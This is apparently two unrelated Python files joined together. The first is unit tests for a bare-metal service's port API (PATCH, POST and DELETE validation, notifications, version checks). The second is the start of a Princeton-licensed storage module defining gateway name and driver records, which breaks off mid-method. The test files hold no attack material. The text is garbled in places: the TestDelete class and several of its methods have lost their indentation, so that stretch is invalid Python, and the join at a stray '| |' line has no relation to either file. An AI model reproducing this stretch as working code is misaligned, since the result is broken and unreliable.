    """A non-string physical_network value must be rejected."""
    headers = {api_base.Version.string: versions.MAX_VERSION_STRING}
    patch = [{'path': '/physical_network', 'value': 1234, 'op': 'replace'}]
    response = self.patch_json('/ports/%s' % self.port.uuid, patch,
                               expect_errors=True, headers=headers)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.BAD_REQUEST, response.status_int)
    self.assertIn('should be string', response.json['error_message'])
def test_invalid_physnet_too_long(self, mock_upd):
    """A physical_network value longer than 64 chars must be rejected."""
    headers = {api_base.Version.string: versions.MAX_VERSION_STRING}
    patch = [{'path': '/physical_network', 'value': 'p' * 65,
              'op': 'replace'}]
    response = self.patch_json('/ports/%s' % self.port.uuid, patch,
                               expect_errors=True, headers=headers)
    self.assertEqual('application/json', response.content_type)
    self.assertEqual(http_client.BAD_REQUEST, response.status_int)
    self.assertIn('maximum character', response.json['error_message'])
def test_portgroups_subresource_patch(self, mock_upd):
    """PATCH through /portgroups/<pg>/ports/<port> is forbidden."""
    portgroup = obj_utils.create_test_portgroup(self.context,
                                                node_id=self.node.id)
    port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                      uuid=uuidutils.generate_uuid(),
                                      portgroup_id=portgroup.id,
                                      address='52:55:00:cf:2d:31')
    headers = {api_base.Version.string: '1.24'}
    url = '/portgroups/%(portgroup)s/ports/%(port)s' % {
        'portgroup': portgroup.uuid, 'port': port.uuid}
    response = self.patch_json(
        url,
        [{'path': '/address', 'value': '00:00:00:00:00:00',
          'op': 'replace'}], headers=headers, expect_errors=True)
    self.assertEqual(http_client.FORBIDDEN, response.status_int)
    self.assertEqual('application/json', response.content_type)
@mock.patch.object(rpcapi.ConductorAPI, 'create_port', autospec=True,
                   side_effect=_rpcapi_create_port)
class TestPost(test_api_base.BaseApiTest):
    """API tests for POST /ports (port creation).

    The class decorator replaces the conductor RPC `create_port` for every
    test; each test method therefore receives `mock_create` as its last
    mock argument.
    """

    def setUp(self):
        super(TestPost, self).setUp()
        self.node = obj_utils.create_test_node(self.context)
        self.portgroup = obj_utils.create_test_portgroup(self.context,
                                                         node_id=self.node.id)
        # Default to the newest API version so all port fields are
        # accepted; tests override this to probe older versions.
        self.headers = {api_base.Version.string: str(
            versions.MAX_VERSION_STRING)}
        p = mock.patch.object(rpcapi.ConductorAPI, 'get_topic_for')
        self.mock_gtf = p.start()
        self.mock_gtf.return_value = 'test-topic'
        self.addCleanup(p.stop)

    @mock.patch.object(common_utils, 'warn_about_deprecated_extra_vif_port_id',
                       autospec=True)
    @mock.patch.object(notification_utils, '_emit_api_notification')
    @mock.patch.object(timeutils, 'utcnow')
    def test_create_port(self, mock_utcnow, mock_notify, mock_warn,
                         mock_create):
        # Happy path: created_at is pinned via utcnow, notifications are
        # emitted, and no deprecation warning fires.
        pdict = post_get_test_port()
        test_time = datetime.datetime(2000, 1, 1, 0, 0)
        mock_utcnow.return_value = test_time
        response = self.post_json('/ports', pdict, headers=self.headers)
        self.assertEqual(http_client.CREATED, response.status_int)
        result = self.get_json('/ports/%s' % pdict['uuid'],
                               headers=self.headers)
        self.assertEqual(pdict['uuid'], result['uuid'])
        self.assertFalse(result['updated_at'])
        return_created_at = timeutils.parse_isotime(
            result['created_at']).replace(tzinfo=None)
        self.assertEqual(test_time, return_created_at)
        # Check location header
        self.assertIsNotNone(response.location)
        expected_location = '/v1/ports/%s' % pdict['uuid']
        self.assertEqual(urlparse.urlparse(response.location).path,
                         expected_location)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')
        mock_notify.assert_has_calls(
            [mock.call(mock.ANY, mock.ANY, 'create',
                       obj_fields.NotificationLevel.INFO,
                       obj_fields.NotificationStatus.START,
                       node_uuid=self.node.uuid,
                       portgroup_uuid=self.portgroup.uuid),
             mock.call(mock.ANY, mock.ANY, 'create',
                       obj_fields.NotificationLevel.INFO,
                       obj_fields.NotificationStatus.END,
                       node_uuid=self.node.uuid,
                       portgroup_uuid=self.portgroup.uuid)])
        self.assertEqual(0, mock_warn.call_count)

    def test_create_port_min_api_version(self, mock_create):
        # Fields newer than MIN_VER must be stripped for the request to
        # be accepted at the minimum API version.
        pdict = post_get_test_port(
            node_uuid=self.node.uuid)
        pdict.pop('local_link_connection')
        pdict.pop('pxe_enabled')
        pdict.pop('extra')
        pdict.pop('physical_network')
        headers = {api_base.Version.string: str(api_v1.MIN_VER)}
        response = self.post_json('/ports', pdict, headers=headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.CREATED, response.status_int)
        self.assertEqual(self.node.uuid, response.json['node_uuid'])
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_doesnt_contain_id(self, mock_create):
        # The DB layer must never be handed a caller-supplied 'id'.
        with mock.patch.object(self.dbapi, 'create_port',
                               wraps=self.dbapi.create_port) as cp_mock:
            pdict = post_get_test_port(extra={'foo': 123})
            self.post_json('/ports', pdict, headers=self.headers)
            result = self.get_json('/ports/%s' % pdict['uuid'],
                                   headers=self.headers)
            self.assertEqual(pdict['extra'], result['extra'])
            cp_mock.assert_called_once_with(mock.ANY)
            # Check that 'id' is not in first arg of positional args
            self.assertNotIn('id', cp_mock.call_args[0][0])
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    @mock.patch.object(notification_utils.LOG, 'exception', autospec=True)
    @mock.patch.object(notification_utils.LOG, 'warning', autospec=True)
    def test_create_port_generate_uuid(self, mock_warning, mock_exception,
                                       mock_create):
        # Omitting 'uuid' makes the API generate one; no notification
        # warnings/exceptions should be logged in the process.
        pdict = post_get_test_port()
        del pdict['uuid']
        response = self.post_json('/ports', pdict, headers=self.headers)
        result = self.get_json('/ports/%s' % response.json['uuid'],
                               headers=self.headers)
        self.assertEqual(pdict['address'], result['address'])
        self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
        self.assertFalse(mock_warning.called)
        self.assertFalse(mock_exception.called)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    @mock.patch.object(notification_utils, '_emit_api_notification')
    def test_create_port_error(self, mock_notify, mock_create):
        # An RPC failure must still emit START then ERROR notifications.
        mock_create.side_effect = Exception()
        pdict = post_get_test_port()
        self.post_json('/ports', pdict, headers=self.headers,
                       expect_errors=True)
        mock_notify.assert_has_calls(
            [mock.call(mock.ANY, mock.ANY, 'create',
                       obj_fields.NotificationLevel.INFO,
                       obj_fields.NotificationStatus.START,
                       node_uuid=self.node.uuid,
                       portgroup_uuid=self.portgroup.uuid),
             mock.call(mock.ANY, mock.ANY, 'create',
                       obj_fields.NotificationLevel.ERROR,
                       obj_fields.NotificationStatus.ERROR,
                       node_uuid=self.node.uuid,
                       portgroup_uuid=self.portgroup.uuid)])
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_valid_extra(self, mock_create):
        # 'extra' accepts arbitrary JSON-serializable values.
        pdict = post_get_test_port(extra={'str': 'foo', 'int': 123,
                                          'float': 0.1, 'bool': True,
                                          'list': [1, 2], 'none': None,
                                          'dict': {'cat': 'meow'}})
        self.post_json('/ports', pdict, headers=self.headers)
        result = self.get_json('/ports/%s' % pdict['uuid'],
                               headers=self.headers)
        self.assertEqual(pdict['extra'], result['extra'])
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_no_mandatory_field_address(self, mock_create):
        pdict = post_get_test_port()
        del pdict['address']
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertEqual('application/json', response.content_type)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_no_mandatory_field_node_uuid(self, mock_create):
        pdict = post_get_test_port()
        del pdict['node_uuid']
        response = self.post_json('/ports', pdict, expect_errors=True)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertEqual('application/json', response.content_type)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_invalid_addr_format(self, mock_create):
        pdict = post_get_test_port(address='invalid-format')
        response = self.post_json('/ports', pdict, expect_errors=True)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertEqual('application/json', response.content_type)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_address_normalized(self, mock_create):
        # MAC addresses are stored lower-cased.
        address = 'AA:BB:CC:DD:EE:FF'
        pdict = post_get_test_port(address=address)
        self.post_json('/ports', pdict, headers=self.headers)
        result = self.get_json('/ports/%s' % pdict['uuid'],
                               headers=self.headers)
        self.assertEqual(address.lower(), result['address'])
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_with_hyphens_delimiter(self, mock_create):
        # Only colon-delimited MACs are accepted.
        pdict = post_get_test_port()
        colonsMAC = pdict['address']
        hyphensMAC = colonsMAC.replace(':', '-')
        pdict['address'] = hyphensMAC
        response = self.post_json('/ports', pdict, expect_errors=True)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertEqual('application/json', response.content_type)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_invalid_node_uuid_format(self, mock_create):
        pdict = post_get_test_port(node_uuid='invalid-format')
        response = self.post_json('/ports', pdict, expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_node_uuid_to_node_id_mapping(self, mock_create):
        pdict = post_get_test_port(node_uuid=self.node['uuid'])
        self.post_json('/ports', pdict, headers=self.headers)
        # GET doesn't return the node_id it's an internal value
        port = self.dbapi.get_port_by_uuid(pdict['uuid'])
        self.assertEqual(self.node['id'], port.node_id)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_node_uuid_not_found(self, mock_create):
        pdict = post_get_test_port(
            node_uuid='1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e')
        response = self.post_json('/ports', pdict, expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_portgroup_uuid_not_found(self, mock_create):
        pdict = post_get_test_port(
            portgroup_uuid='1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e')
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_portgroup_uuid_not_found_old_api_version(
            self, mock_create):
        # Without the version header the portgroup field itself is not
        # accepted, so the failure is NOT_ACCEPTABLE rather than 400.
        pdict = post_get_test_port(
            portgroup_uuid='1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e')
        response = self.post_json('/ports', pdict, expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_portgroup(self, mock_create):
        pdict = post_get_test_port(
            portgroup_uuid=self.portgroup.uuid,
            node_uuid=self.node.uuid)
        response = self.post_json('/ports', pdict, headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.CREATED, response.status_int)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_portgroup_different_nodes(self, mock_create):
        # A port's node and its portgroup's node must match.
        pdict = post_get_test_port(
            portgroup_uuid=self.portgroup.uuid,
            node_uuid=uuidutils.generate_uuid())
        response = self.post_json('/ports', pdict, headers=self.headers,
                                  expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertFalse(mock_create.called)

    def test_create_port_portgroup_old_api_version(self, mock_create):
        pdict = post_get_test_port(
            portgroup_uuid=self.portgroup.uuid,
            node_uuid=self.node.uuid
        )
        headers = {api_base.Version.string: '1.15'}
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
        self.assertFalse(mock_create.called)

    @mock.patch.object(notification_utils, '_emit_api_notification')
    def test_create_port_address_already_exist(self, mock_notify,
                                               mock_create):
        # Duplicate MAC -> 409 CONFLICT with ERROR notification.
        address = 'AA:AA:AA:11:22:33'
        mock_create.side_effect = exception.MACAlreadyExists(mac=address)
        pdict = post_get_test_port(address=address, node_id=self.node.id)
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual(http_client.CONFLICT, response.status_int)
        self.assertEqual('application/json', response.content_type)
        error_msg = response.json['error_message']
        self.assertTrue(error_msg)
        self.assertIn(address, error_msg.upper())
        self.assertTrue(mock_create.called)
        mock_notify.assert_has_calls(
            [mock.call(mock.ANY, mock.ANY, 'create',
                       obj_fields.NotificationLevel.INFO,
                       obj_fields.NotificationStatus.START,
                       node_uuid=self.node.uuid,
                       portgroup_uuid=pdict['portgroup_uuid']),
             mock.call(mock.ANY, mock.ANY, 'create',
                       obj_fields.NotificationLevel.ERROR,
                       obj_fields.NotificationStatus.ERROR,
                       node_uuid=self.node.uuid,
                       portgroup_uuid=pdict['portgroup_uuid'])])

    def test_create_port_with_internal_field(self, mock_create):
        # internal_info is read-only via the API.
        pdict = post_get_test_port()
        pdict['internal_info'] = {'a': 'b'}
        response = self.post_json('/ports', pdict, expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_some_invalid_local_link_connection_key(
            self, mock_create):
        pdict = post_get_test_port(
            local_link_connection={'switch_id': 'value1',
                                   'port_id': 'Ethernet1/15',
                                   'switch_foo': 'value3'})
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_local_link_connection_keys(self, mock_create):
        pdict = post_get_test_port(
            local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
                                   'port_id': 'Ethernet1/15',
                                   'switch_info': 'value3'})
        response = self.post_json('/ports', pdict, headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.CREATED, response.status_int)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_local_link_connection_switch_id_bad_mac(
            self, mock_create):
        pdict = post_get_test_port(
            local_link_connection={'switch_id': 'zz:zz:zz:zz:zz:zz',
                                   'port_id': 'Ethernet1/15',
                                   'switch_info': 'value3'})
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertTrue(response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_local_link_connection_missing_mandatory(
            self, mock_create):
        # 'port_id' is mandatory inside local_link_connection.
        pdict = post_get_test_port(
            local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
                                   'switch_info': 'fooswitch'})
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertFalse(mock_create.called)

    def test_create_port_local_link_connection_missing_optional(
            self, mock_create):
        # 'switch_info' is optional.
        pdict = post_get_test_port(
            local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
                                   'port_id': 'Ethernet1/15'})
        response = self.post_json('/ports', pdict, headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.CREATED, response.status_int)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def test_create_port_with_llc_old_api_version(self, mock_create):
        headers = {api_base.Version.string: '1.14'}
        pdict = post_get_test_port(
            local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
                                   'port_id': 'Ethernet1/15'})
        response = self.post_json('/ports', pdict, headers=headers,
                                  expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
        self.assertFalse(mock_create.called)

    def test_create_port_with_pxe_enabled_old_api_version(self, mock_create):
        headers = {api_base.Version.string: '1.14'}
        pdict = post_get_test_port(pxe_enabled=False)
        del pdict['local_link_connection']
        del pdict['portgroup_uuid']
        response = self.post_json('/ports', pdict, headers=headers,
                                  expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
        self.assertFalse(mock_create.called)

    def test_create_port_with_physical_network(self, mock_create):
        physical_network = 'physnet1'
        pdict = post_get_test_port(
            physical_network=physical_network,
            node_uuid=self.node.uuid)
        response = self.post_json('/ports', pdict, headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.CREATED, response.status_int)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')
        self.assertEqual(physical_network, response.json['physical_network'])
        port = objects.Port.get(self.context, pdict['uuid'])
        self.assertEqual(physical_network, port.physical_network)

    def test_create_port_with_physical_network_old_api_version(
            self, mock_create):
        headers = {api_base.Version.string: '1.33'}
        pdict = post_get_test_port(physical_network='physnet1')
        response = self.post_json('/ports', pdict, headers=headers,
                                  expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
        self.assertFalse(mock_create.called)

    @mock.patch.object(objects.Port, 'supports_physical_network')
    def test_create_port_with_physical_network_upgrade(self, mock_spn,
                                                       mock_create):
        # Service pinned to a release without physical_network support.
        mock_spn.return_value = False
        pdict = post_get_test_port(physical_network='physnet1')
        response = self.post_json('/ports', pdict, headers=self.headers,
                                  expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
        self.assertFalse(mock_create.called)

    def test_portgroups_subresource_post(self, mock_create):
        # Creating through the portgroup sub-resource is forbidden.
        headers = {api_base.Version.string: '1.24'}
        pdict = post_get_test_port()
        response = self.post_json('/portgroups/%s/ports' % self.portgroup.uuid,
                                  pdict, headers=headers, expect_errors=True)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.FORBIDDEN, response.status_int)
        self.assertFalse(mock_create.called)

    @mock.patch.object(common_utils, 'warn_about_deprecated_extra_vif_port_id',
                       autospec=True)
    def test_create_port_with_extra_vif_port_id_deprecated(self, mock_warn,
                                                           mock_create):
        pdict = post_get_test_port(pxe_enabled=False,
                                   extra={'vif_port_id': 'foo'})
        response = self.post_json('/ports', pdict, headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.CREATED, response.status_int)
        self.assertEqual(1, mock_warn.call_count)
        mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                            'test-topic')

    def _test_create_port(self, mock_create, has_vif=False, in_portgroup=False,
                          pxe_enabled=True, standalone_ports=True,
                          http_status=http_client.CREATED):
        # Parameterized helper covering the vif/portgroup/pxe/standalone
        # combination matrix; expects success iff http_status is CREATED.
        extra = {}
        if has_vif:
            extra = {'vif_port_id': uuidutils.generate_uuid()}
        pdict = post_get_test_port(
            node_uuid=self.node.uuid,
            pxe_enabled=pxe_enabled,
            extra=extra)
        if not in_portgroup:
            pdict.pop('portgroup_uuid')
        else:
            self.portgroup.standalone_ports_supported = standalone_ports
            self.portgroup.save()
        expect_errors = http_status != http_client.CREATED
        response = self.post_json('/ports', pdict, headers=self.headers,
                                  expect_errors=expect_errors)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_status, response.status_int)
        if not expect_errors:
            expected_portgroup_uuid = pdict.get('portgroup_uuid', None)
            self.assertEqual(expected_portgroup_uuid,
                             response.json['portgroup_uuid'])
            self.assertEqual(extra, response.json['extra'])
            mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
                                                'test-topic')
        else:
            self.assertFalse(mock_create.called)

    def test_create_port_novif_pxe_noportgroup(self, mock_create):
        self._test_create_port(mock_create, has_vif=False, in_portgroup=False,
                               pxe_enabled=True,
                               http_status=http_client.CREATED)

    def test_create_port_novif_nopxe_noportgroup(self, mock_create):
        self._test_create_port(mock_create, has_vif=False, in_portgroup=False,
                               pxe_enabled=False,
                               http_status=http_client.CREATED)

    def test_create_port_vif_pxe_noportgroup(self, mock_create):
        self._test_create_port(mock_create, has_vif=True, in_portgroup=False,
                               pxe_enabled=True,
                               http_status=http_client.CREATED)

    def test_create_port_vif_nopxe_noportgroup(self, mock_create):
        self._test_create_port(mock_create, has_vif=True, in_portgroup=False,
                               pxe_enabled=False,
                               http_status=http_client.CREATED)

    def test_create_port_novif_pxe_portgroup_standalone_ports(self,
                                                              mock_create):
        self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
                               pxe_enabled=True,
                               standalone_ports=True,
                               http_status=http_client.CREATED)

    def test_create_port_novif_pxe_portgroup_nostandalone_ports(self,
                                                                mock_create):
        self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
                               pxe_enabled=True,
                               standalone_ports=False,
                               http_status=http_client.CONFLICT)

    def test_create_port_novif_nopxe_portgroup_standalone_ports(self,
                                                                mock_create):
        self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
                               pxe_enabled=False,
                               standalone_ports=True,
                               http_status=http_client.CREATED)

    def test_create_port_novif_nopxe_portgroup_nostandalone_ports(
            self, mock_create):
        self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
                               pxe_enabled=False,
                               standalone_ports=False,
                               http_status=http_client.CREATED)

    def test_create_port_vif_pxe_portgroup_standalone_ports(self, mock_create):
        self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
                               pxe_enabled=True,
                               standalone_ports=True,
                               http_status=http_client.CREATED)

    def test_create_port_vif_pxe_portgroup_nostandalone_ports(self,
                                                              mock_create):
        self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
                               pxe_enabled=True,
                               standalone_ports=False,
                               http_status=http_client.CONFLICT)

    def test_create_port_vif_nopxe_portgroup_standalone_ports(self,
                                                              mock_create):
        self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
                               pxe_enabled=False,
                               standalone_ports=True,
                               http_status=http_client.CREATED)

    def test_create_port_vif_nopxe_portgroup_nostandalone_ports(self,
                                                                mock_create):
        self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
                               pxe_enabled=False,
                               standalone_ports=False,
                               http_status=http_client.CONFLICT)

    def test_create_port_invalid_physnet_non_text(self, mock_create):
        physnet = 1234
        pdict = post_get_test_port(physical_network=physnet)
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertIn('should be string', response.json['error_message'])
        self.assertFalse(mock_create.called)

    def test_create_port_invalid_physnet_too_long(self, mock_create):
        physnet = 'p' * 65
        pdict = post_get_test_port(physical_network=physnet)
        response = self.post_json('/ports', pdict, expect_errors=True,
                                  headers=self.headers)
        self.assertEqual('application/json', response.content_type)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertIn('maximum character', response.json['error_message'])
        self.assertFalse(mock_create.called)
@mock.patch.object(rpcapi.ConductorAPI, 'destroy_port')
class TestDelete(test_api_base.BaseApiTest):
def setUp(self):
super(TestDelete, self).setUp()
self.node = obj_utils.create_test_node(self.context)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
gtf = mock.patch.object(rpcapi.ConductorAPI, 'get_topic_for')
self.mock_gtf = gtf.start()
self.mock_gtf.return_value = 'test-topic'
self.addCleanup(gtf.stop)
def test_delete_port_byaddress(self, mock_dpt):
response = self.delete('/ports/%s' % self.port.address,
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn(self.port.address, response.json['error_message'])
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_port_byid(self, mock_notify, mock_dpt):
self.delete('/ports/%s' % self.port.uuid, expect_errors=True)
self.assertTrue(mock_dpt.called)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=None),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid,
portgroup_uuid=None)])
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_port_node_locked(self, mock_notify, mock_dpt):
self.node.reserve(self.context, 'fake', self.node.uuid)
mock_dpt.side_effect = exception.NodeLocked(node='fake-node',
host='fake-host')
ret = self.delete('/ports/%s' % self.port.uuid, expect_errors=True)
self.assertEqual(http_client.CONFLICT, ret.status_code)
self.assertTrue(ret.json['error_message'])
self.assertTrue(mock_dpt.called)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=None),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR,
node_uuid=self.node.uuid,
portgroup_uuid=None)])
    def test_portgroups_subresource_delete(self, mock_dpt):
        # Deleting a port through the portgroup sub-resource URL is not
        # allowed even at API version 1.24 (which exposes portgroups):
        # the API must respond 403 Forbidden.
        portgroup = obj_utils.create_test_portgroup(self.context,
                                                    node_id=self.node.id)
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          uuid=uuidutils.generate_uuid(),
                                          portgroup_id=portgroup.id,
                                          address='52:55:00:cf:2d:31')
        headers = {api_base.Version.string: '1.24'}
        response = self.delete(
            '/portgroups/%(portgroup)s/ports/%(port)s' %
            {'portgroup': portgroup.uuid, 'port': port.uuid},
            headers=headers, expect_errors=True)
        self.assertEqual(http_client.FORBIDDEN, response.status_int)
        self.assertEqual('application/json', response.content_type)
| |
#!/usr/bin/python
"""
Copyright 2013 The Trustees of Princeton University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import storage.storagetypes as storagetypes
import os
import base64
import urllib
import uuid
import json
from Crypto.Hash import SHA256 as HashAlg
from Crypto.PublicKey import RSA as CryptoKey
from Crypto import Random
from Crypto.Signature import PKCS1_PSS as CryptoSigner
import types
import errno
import time
import datetime
import random
import logging
import string
import binascii
import traceback
from common.msconfig import *
def is_int( x ):
    """
    Return True if x can be converted to an int, False otherwise.
    """
    try:
        int(x)
        return True
    except (TypeError, ValueError):
        # Only conversion failures mean "not an int"; the old bare except
        # also swallowed KeyboardInterrupt/SystemExit.
        return False
class GatewayNameHolder( storagetypes.Object ):
    """
    Reservation record marking a Gateway's name as taken.
    """

    name = storagetypes.String()      # the reserved gateway name
    g_id = storagetypes.Integer()     # ID of the gateway holding the name

    required_attrs = [
        "name"
    ]

    @classmethod
    def make_key_name( cls, name ):
        """Datastore key name under which the reservation for `name` lives."""
        return "GatewayNameHolder: name=%s" % (name)

    @classmethod
    def create_async( cls, _name, _id ):
        """Atomically reserve _name for gateway _id (asynchronous)."""
        key_name = cls.make_key_name( _name )
        return GatewayNameHolder.get_or_insert_async( key_name, name=_name, g_id=_id )
class GatewayDriver( storagetypes.Object):
    """
    Gateway driver, addressed by the hash of its text.
    Reference-counted: each gateway that uses the driver holds one ref.
    """

    driver_hash = storagetypes.String()   # hex string (SHA256 of driver_text)
    driver_text = storagetypes.Blob()
    refcount = storagetypes.Integer()

    @classmethod
    def hash_driver( cls, driver_text ):
        """Return the hex digest (SHA256, via HashAlg) of driver_text."""
        h = HashAlg.new()
        h.update( driver_text )
        return h.hexdigest()

    @classmethod
    def make_key_name( cls, driver_hash ):
        """Datastore key name for the driver with the given hash."""
        return "GatewayDriver: hash=%s" % (driver_hash)

    @classmethod
    def create_or_ref( cls, _text ):
        """
        Create a new driver, or re-ref the existing one.
        Do so atomically.
        """
        driver_hash = cls.hash_driver( _text )

        def txn():
            dk = storagetypes.make_key( GatewayDriver, GatewayDriver.make_key_name( driver_hash ) )
            d = dk.get()
            if d is None:
                # first reference: create the record
                d = GatewayDriver( key=dk, driver_hash=driver_hash, driver_text=_text, refcount=1 )
                d.put()
            else:
                d.refcount += 1
                d.put()
            return d

        return storagetypes.transaction( txn )

    @classmethod
    def ref( cls, driver_hash ):
        """
        Increment reference count.
        Do this in an "outer" transaction (i.e. Gateway.Update)
        Return False if the driver does not exist; True on success.
        """
        dk = storagetypes.make_key( GatewayDriver, cls.make_key_name( driver_hash ) )
        d = dk.get()
        if d is None:
            return False
        d.refcount += 1
        d.put()
        return True

    @classmethod
    def unref( cls, driver_hash ):
        """
